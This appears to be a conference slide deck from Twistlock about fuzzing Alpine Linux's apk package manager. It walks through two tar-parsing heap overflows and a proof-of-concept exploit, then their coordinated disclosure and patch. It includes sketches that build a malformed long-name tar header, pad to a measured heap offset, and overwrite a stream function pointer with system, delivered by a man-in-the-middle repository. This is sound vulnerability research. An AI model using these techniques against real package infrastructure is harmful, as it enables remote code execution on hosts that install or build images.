Exploiting Alpine Linux - Twistlock

From vulnerability discovery to code execution

Exploiting Alpine Linux

By Ariel Zelivansky, Security Researcher

What is Alpine Linux?

● Lightweight Linux distribution

● Alpine’s motto: Small, simple and secure

● Alpine docker image only 5 MB in size

● Security in mind

○ The kernel is patched with a port of grsecurity/PaX

○ Userspace binaries compiled as PIE, NX enabled, full RELRO, with stack smashing protection

https://en.wikipedia.org/wiki/Buffer_overflow_protection

Who uses Alpine?

● Alpine has become widely popular for use with containers (10M+ pulls)

● Many Docker images are now based on Alpine

● Docker has officially stated their support of Alpine

Researching Alpine

● What does an alpine container consist of?

○ musl libc

○ busybox userspace binaries

○ apk-tools

● What do people do with Alpine containers?

○ Download more programs!

○ apk - Alpine’s package manager

Apk

● A tool to install, upgrade and delete packages (aka a package manager)

● Historically a collection of shell scripts, now written in C

● To add a package - apk update and apk add [name]

○ Or just apk add [name] -U/--update

● Can I somehow alter packages or convince apk to downgrade packages?

Apk

● Documentation first (Alpine’s wiki)

○ /etc/apk/repositories - list of local/remote repositories

○ By default with docker image - plain http

● Prone to MITM attack

● Fortunately, an attack is not so simple

○ Packages are signed

○ See /etc/apk/keys

● What about update?

○ “A repository is simply a directory with a collection of *.apk files. The directory must include a special index file, named APKINDEX.tar.gz to be considered a repository.”

○ Update essentially downloads and parses the APKINDEX.tar.gz file
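
To make the "index is just a tar.gz" point concrete, here is a minimal Python sketch that builds a stand-in index in memory and lists its members. The member names (a `.SIGN.RSA.*` signature file, `DESCRIPTION`, `APKINDEX`) and their contents are assumptions for illustration, not taken from a real repository.

```python
import io
import tarfile

def build_sample_index():
    """Build a tiny stand-in for APKINDEX.tar.gz entirely in memory."""
    members = [
        # Hypothetical member names and contents, for illustration only.
        (".SIGN.RSA.example.rsa.pub", b"<signature bytes>"),
        ("DESCRIPTION", b"sample index\n"),
        ("APKINDEX", b"P:example\nV:0.0.0-r0\n\n"),
    ]
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in members:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def list_members(index_bytes):
    """Return the member names found inside a gzip-compressed tar."""
    with tarfile.open(fileobj=io.BytesIO(index_bytes), mode="r:gz") as tar:
        return tar.getnames()

index = build_sample_index()
names = list_members(index)
print(names)
```

If the signature really is a member of the same archive, the parser has to walk attacker-controlled tar data before any signature check can succeed, which is what makes the tar parser an interesting target.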

Apk

● Signature inside archive?

● Sounds like fuzzing time

○ What’s fuzzing?

○ american fuzzy lop (afl-fuzz)

■ Finds lots of bugs (and vulnerabilities) in open source software projects

■ Compile with afl-gcc to instrument file

Apk

● Clone apk-tools from alpine’s git repository

● Empty README

● Relevant code seems likely to be in update.c

● main is in apk.c

● After inspecting the code for a while, it appears each action is defined as an applet

Apk

● update.c doesn't seem to do anything

○ Actual code in database.c looks for the APK_UPDATE_CACHE flag

○ After briefly learning the code, I was ready to fuzz it

● Writing my own applet

○ Read data from file (fuzzer will provide)

○ Call apk_bstream_from_file to read the file

○ Call apk_db_index_read with the data

○ Define applet, add to Makefile

● Running afl inside docker container

○ Easy to set up and reproduce

Fuzzing Apk

● Fuzzer does nothing

● Tried fuzzing several other functions, tweaking the code to allow fuzzing

● Finally, decided on fuzzing apk_tar_parse

○ Looks promising

Fuzzing Apk

● Fuzzing was very slow in my experience

● Diving into the code again

○ Removed anything that might slow down the fuzzer and I don’t need

○ init_openssl

○ apk_db_init / apk_db_open

● Fuzz time

Fuzzing Apk

● Multiple crashes

● Triaging crashes with crashwalk

○ Runs through all crashes and identifies the crash type

○ Suggests if exploitable

○ My final summary results in 6 different crashes

Reproducing the crash

● So far I was only able to reach the crashes in my modified code

● To reproduce with the real apk, I used a crash as a bad tar.gz file

○ cat crash | gzip -9 > ~/docker/files/alpine/v3.6/main/x86_64/APKINDEX.tar.gz

○ Served the file from my local server

○ docker run -ti --add-host dl-cdn.alpinelinux.org:172.17.0.2 alpine:3.6

○ Upon running apk update, a segfault occurred!

● After a debugging session with gdb, I determined the origin of the crash
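
The staging step above (`cat crash | gzip -9 > .../APKINDEX.tar.gz`) can be sketched in Python as follows. The helper name `stage_index`, the temporary web root, and the placeholder crash bytes are assumptions; only the repository sub-path comes from the slide.

```python
import gzip
import os
import tempfile

# Repository sub-path taken from the slide; the web root itself is arbitrary.
REPO_SUBDIR = os.path.join("alpine", "v3.6", "main", "x86_64")

def stage_index(crash_bytes, web_root):
    """Gzip a raw crash file and store it as the repository index."""
    target_dir = os.path.join(web_root, REPO_SUBDIR)
    os.makedirs(target_dir, exist_ok=True)
    target = os.path.join(target_dir, "APKINDEX.tar.gz")
    with gzip.open(target, "wb", compresslevel=9) as out:
        out.write(crash_bytes)
    return target

web_root = tempfile.mkdtemp()
crash = b"\x00" * 512  # placeholder; a real run would use an afl crash file
staged = stage_index(crash, web_root)

# Read it back to confirm the server would hand out the same bytes.
with gzip.open(staged, "rb") as f:
    roundtrip = f.read()
print(staged)
```

Any static file server pointed at `web_root` would then play the role of the local mirror that the container resolves through `--add-host`.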

Explaining the bugs

● The result is two (similar) heap overflow vulnerabilities

● Let’s examine the relevant code (inside archive.c)

● Tar consists of blocks of 512 bytes, starting with a tar header block for each file

○ Reads tar stream in chunks, runs callback function on each chunk

● One of the fields of the header is a typeflag

○ One of its uses is to indicate special blocks, such as the “GNU long name extension”

○ This extension indicates that the following block holds the full name of the file (the header's name field is limited to 100 bytes)

● How is this implemented?
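
Before looking at apk's implementation, it may help to see the header fields involved. The sketch below uses Python's `tarfile` module to produce a GNU long name block and reads the name, size, and typeflag fields at their standard offsets (0, 124, and 156). The helper `parse_header` is hypothetical and is not apk's parser.

```python
import tarfile

BLOCK = 512

def parse_header(block):
    """Extract name, size, and typeflag from one 512-byte tar header."""
    if len(block) != BLOCK:
        raise ValueError("a tar header is exactly 512 bytes")
    name = block[0:100].split(b"\0", 1)[0].decode()
    # The size field is ASCII octal, padded with NULs or spaces.
    size = int(block[124:136].rstrip(b"\0 ") or b"0", 8)
    typeflag = block[156:157]
    return name, size, typeflag

# A 150-character name does not fit the 100-byte name field, so the GNU
# format emits an extra 'L' header, then the name data, then the real header.
info = tarfile.TarInfo("a" * 150)
raw = info.tobuf(format=tarfile.GNU_FORMAT)

long_header = parse_header(raw[:BLOCK])
print(long_header)
```

The size stored in the `L` header is the name length plus a terminating NUL, and it is exactly this attacker-supplied size that drives the allocation discussed next.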

Explaining the bugs

● Uses blob_realloc to allocate the buffer for the name

Explaining the bugs

● int is naturally signed

○ b->len is long, also signed

○ The comparison is signed

● Any size of 0x80000000 or more exceeds the maximum signed 32-bit integer (0x7fffffff), is treated as negative, and leaves the buffer unmodified
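
The effect of the signed comparison can be modelled in a few lines of Python. This is a rough model under stated assumptions, not apk's C code: `blob_realloc_model` is a hypothetical stand-in that treats the requested size as a 32-bit signed `int` and skips the resize when the current length already compares as large enough.

```python
import ctypes

def as_int32(value):
    """Reinterpret the low 32 bits of value as a signed C int."""
    return ctypes.c_int32(value & 0xFFFFFFFF).value

def blob_realloc_model(buf, requested):
    """Model of a grow-only realloc whose size parameter is a signed int."""
    size = as_int32(requested)      # the parameter is declared as int
    if len(buf) >= size:            # signed comparison
        return buf                  # looks big enough: buffer left untouched
    return buf + bytearray(size - len(buf))

small = blob_realloc_model(bytearray(16), 64)
huge = blob_realloc_model(bytearray(16), 0x80000000)
print(len(small), len(huge))
```

A request for 64 bytes grows the buffer, while a request for 0x80000000 bytes wraps to a negative number and returns the original 16-byte buffer, even though the caller goes on to read the full size into it.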

Explaining the bugs

● In the following call to is->read, a huge number of bytes is copied into the buffer

○ AKA Heap overflow

○ As long as is->read accepts the size as unsigned

○ In the case of a tar.gz, is->read is gzi_read which accepts size_t (unsigned)

Explaining the bugs

● So to fix, make blob_realloc accept size_t!

○ Yes, but also make sure entry.size is not max int (because a +1 would overflow it)

● A similar bug occurred with a pax header block (another special block)
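
As a sketch of the two checks named above (a non-negative size, and room for the `+1`), the validation could look like this in Python. It is not the actual apk-tools patch; `checked_name_alloc_size` is a hypothetical helper and `INT_MAX` assumes a 32-bit `int`.

```python
INT_MAX = 2**31 - 1  # assumes a 32-bit C int

def checked_name_alloc_size(entry_size):
    """Return the allocation size for a long name, or reject the entry."""
    # Reject negative sizes and anything where entry_size + 1 would not fit.
    if entry_size < 0 or entry_size >= INT_MAX:
        raise ValueError("long name size out of range: %r" % entry_size)
    return entry_size + 1  # one extra byte for the terminating NUL

ok = checked_name_alloc_size(10)

rejected = []
for bad in (-1, INT_MAX, 0xFFFFFFFF):
    try:
        checked_name_alloc_size(bad)
    except ValueError:
        rejected.append(bad)
print(ok, rejected)
```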

Developing an exploit

● I built a minimalistic tar file

○ To trigger the bug, I put a longname block with a negative size

○ In tar, the size is an octal number in ASCII; I went with 0o77777777777 (-1 as a signed 32-bit integer)
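
A header like the one described can be assembled by hand. The sketch below is a hedged illustration and not the author's actual file: it fills only the name, size, typeflag, and checksum fields at their standard tar offsets, and the helper names are hypothetical.

```python
import ctypes

BLOCK = 512

def as_int32(value):
    """Reinterpret the low 32 bits of value as a signed C int."""
    return ctypes.c_int32(value & 0xFFFFFFFF).value

def longname_header(size_field):
    """Build a minimal GNU long name ('L') header with a raw size field."""
    header = bytearray(BLOCK)
    header[0:13] = b"././@LongLink"
    header[124:124 + len(size_field)] = size_field  # ASCII octal size
    header[156:157] = b"L"                          # typeflag
    # Standard tar checksum: sum of all bytes with the field set to spaces.
    header[148:156] = b" " * 8
    checksum = sum(header)
    header[148:156] = b"%06o\0 " % checksum
    return bytes(header)

header = longname_header(b"77777777777")
parsed = int(header[124:135], 8)
print(hex(parsed), as_int32(parsed))
```

Parsed as octal, the field is 0x1ffffffff; its low 32 bits are all ones, which is -1 once stored in a signed 32-bit `int`.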


● The execution crashed as expected

○ The crash was on the copy of a null-terminating zero meant for the entry.name buffer

○ entry.name was not allocated, so it pointed to null

○ entry.size was 0xffffffffffffffff (it was implicitly converted to 64-bit, it’s of type off_t)


● I created another file, with two blocks

○ First block to allocate the buffer with a size I want

○ Second block exploits the vulnerability with the allocated buffer

● Debugging the execution, it seems everything goes as expected

○ The buffer is allocated then overwritten

○ The code works to my advantage - is->read is gzi_read

■ gzi_read copies chunks from the source stream to the target and stops once the source runs out!

■ No need to worry about the source’s size


● There are various known ways to exploit a heap overflow

○ Remember musl libc? Memory allocation (malloc, realloc) is done by it

○ I preferred not to research it

○ I can work around that by building the exploit from apk's own code

■ Is there anything useful on the heap? A flag to change? Structs with callbacks?

■ I could simply change a callback address to execv or system

● Mitigations?

○ ASLR

○ For the sake of a proof-of-concept, ignoring ASLR


● Lots of trial and error, trying to find structs after entry.name I should overwrite

● I realized I can just use the is struct, which is used on is->read

● It is of type apk_istream

● I put a breakpoint on the call to is->read

● I calculated the delta between my buffer (entry.name) and the is struct


● I filled my tar file with 0x153a0 bytes, followed by 16 zero bytes

● It worked!

○ The execution crashed on 0x0000000000000000

● Next step - call system with a string I control
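
The padding-plus-overwrite layout described above can be sketched as follows. The delta 0x153a0 is the value from the talk and is specific to that build and run; the filler byte and the helper name `overflow_payload` are arbitrary choices for illustration.

```python
DELTA = 0x153A0  # distance from entry.name to the is struct, from the talk

def overflow_payload(delta, tail, filler=b"A"):
    """Pad up to the target struct, then append the bytes that overwrite it."""
    return filler * delta + tail

# 16 zero bytes cover two 8-byte fields at the start of the struct, so the
# next call through the overwritten function pointer jumps to address 0.
payload = overflow_payload(DELTA, b"\0" * 16)
print(len(payload))
```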


● is->read parameters?

○ is->read(is, entry.name, entry.size);

● Since the first parameter is itself, I could overwrite the first 8 bytes of it with my shell string

○ The first 8 bytes are of get_meta which is not called in our context

○ I used “echo 1” as the string

○ It worked!

● New problems

○ Shell string limit is 8 bytes, too short

○ The next day I failed to reproduce the exploit

■ is->read seems to write the data in chunks, so it only writes 4 bytes and calls is->read again (which is only partly modified)
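
The 8-byte string trick and its limit can be pictured with a small packing sketch. It assumes a 64-bit little-endian layout in which get_meta occupies the first 8 bytes and read the next 8; the address used is a placeholder, not a real location of system, and `fake_istream` is a hypothetical helper.

```python
import struct

PLACEHOLDER_ADDR = 0x4141414141414141  # hypothetical; depends on the process

def fake_istream(command, read_target):
    """Pack a shell string over get_meta and a new pointer over read."""
    # Assumption: the string needs a NUL terminator inside the 8-byte slot,
    # otherwise it would run into the pointer bytes that follow.
    if len(command) > 7:
        raise ValueError("command does not fit in the 8-byte get_meta slot")
    return struct.pack("<8sQ", command, read_target)

blob = fake_istream(b"echo 1", PLACEHOLDER_ADDR)
print(blob)

try:
    fake_istream(b"echo too long", PLACEHOLDER_ADDR)
    too_long_rejected = False
except ValueError:
    too_long_rejected = True
```

The rejection of the longer string shows why an 8-byte slot is too cramped for a useful command, which motivates looking for a roomier struct.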


● How would I find what’s after the is struct?

● I restored the is struct in the file (copying the actual addresses)

● I added random bytes after it

● gis->bs pointer seems like a good choice

● It is of type apk_bstream


● gis->bs->read is used in the same manner as is->read

● It has 8 more bytes to use for the shell string (used for flags)

● This time I overwrote a pointer to the struct, unlike is, where I had overwritten the struct itself

● I put my data just 32 bytes before the is struct

○ I could put it anywhere I have control of

gis->bs->flags | gis->bs->get_meta | gis->bs->read (overwritten to system) | gis->bs->close | is->get_meta ...


● It works!

Demonstration

Real attack vector

● Man-in-the-middle in an organization

○ Attacker gets code execution on any alpine package install or update

○ Attacker gets code execution on building alpine images

○ Signature did not help since it’s taken from inside the tar

Final steps

● I’ve found a vulnerability, what next?

● Responsible/Coordinated disclosure

○ Estimate the impact, write a proof-of-concept if it makes sense

○ Contact the developers

■ Nearly always privately, you don’t want public disclosure

■ Work on a fix

○ Assign CVE IDs

■ Check for the correct CNA (CVE Numbering Authority)

■ Otherwise contact MITRE through their web form

○ Disclose the vulnerability online

■ For open source the oss-security mailing list is a good choice

Final steps

● The bugs I found affect all apk versions since 2.5.0_rc1

● I reached alpine’s developers on IRC

○ Discussed the issues with Timo Teräs in private emails

○ A patch was released very quickly and was pushed to apk-tools 2.7.2 and 2.6.9

■ All alpine versions from current to 3.2-stable include the fix

○ Besides fixing the bugs, Timo also implemented additional hardenings to restrict attackers from creating a similar exploit

■ This is done by removing the use of function pointers that are saved on structs on the heap

● I sent an advisory to oss-sec and wrote about the issue on the Twistlock blog

http://seclists.org/oss-sec/2017/q2/598

https://www.twistlock.com/2017/06/25/alpine-linux-pt-1-2/

Future ideas

● Fuzzing other parts of apk

● Fuzzing other alpine tools

● Fuzzing libfetch

Ariel [email protected]

@TwistlockLabs (new!)

Blog: Twistlock.com/blog

Thank you!
